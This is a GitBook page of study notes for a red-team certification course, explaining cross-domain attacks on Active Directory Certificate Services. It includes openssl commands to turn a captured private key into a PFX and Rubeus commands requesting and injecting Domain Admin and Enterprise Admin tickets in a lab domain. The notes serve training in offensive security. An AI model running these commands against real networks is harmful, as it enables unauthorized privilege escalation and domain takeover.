CRTE Certified Red Team Expert
HomeCertifications
  • Certified Red Team Expert (CRTE)
  • Exam Info
    • Reviews and Notes
    • Nikhil Mittal Videos
    • Course Content
  • 1️⃣Active Directory Enumeration
    • Objectives Description
  • 2️⃣Local Privilege Escalation
    • Description
  • 3️⃣Offensive .NET and PowerShell Tradecraft
    • Description
  • 4️⃣Domain Privilege Escalation
    • Description
    • LAPS
    • RBCD -
  • Lateral Movement
    • Description
  • Domain Dominance & Persistence
    • Description
    • Silver Ticket
    • Golden Ticket
    • Skeleton Key
    • Diamond Ticket
  • Cross Domain Attacks
    • ✅Description
    • 🟢Shadow Credentials
    • 🟢AD CS
  • Cross Forest Attacks
    • Description
    • 🟢Kerberoast
    • 🟢SID Abuse
    • 🟢AbusingPAM Trust
  • Defenses
    • Description
  • Detection & Detection Bypasses
    • Description
  • Deception
    • Description
Powered by GitBook
On this page

Was this helpful?

  1. Cross Domain Attacks

AD CS

PreviousShadow CredentialsNextDescription

Last updated 1 year ago

Was this helpful?

Cross Domain Attacks in Active Directory Certificate Services (AD CS)

Cross-domain attacks in AD CS exploit vulnerabilities in the configuration or implementation of Active Directory Certificate Services. AD CS is used to manage certificates for network security, including the authentication of users, computers, and services.

The attacks aim to escalate privileges across domain boundaries, potentially allowing an attacker to gain unauthorized access to resources or perform actions with elevated privileges.

Key Points:

  • PKI Misconfiguration: Attackers can exploit poorly configured Public Key Infrastructures (PKIs), leading to unauthorized certificate issuance.

  • Certificate Template Vulnerabilities: Abuse of misconfigured certificate templates can allow attackers to issue certificates for themselves with elevated privileges.

  • Escalation of Privilege: Attackers may use these vulnerabilities to escalate from a low-privileged user to higher-level administrative privileges across domains.

  • Defense Strategies: Regularly audit AD CS configurations, limit the rights to manage CA and certificate templates, and implement monitoring for unusual certificate issuance activities.

Change the RSA into a PFX

Paste the Private key in a file named : cert.pem

# linux
# openssl and provide a password
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# windows
# openssl and provide a password
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem - keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx

4. Request a TGT with the pfx

# Rubeus
# Request DA TGT and inject it
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /ptt

# Request EA TGT and inject it
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt

🟢
Sign up to our mailing list to receive updates!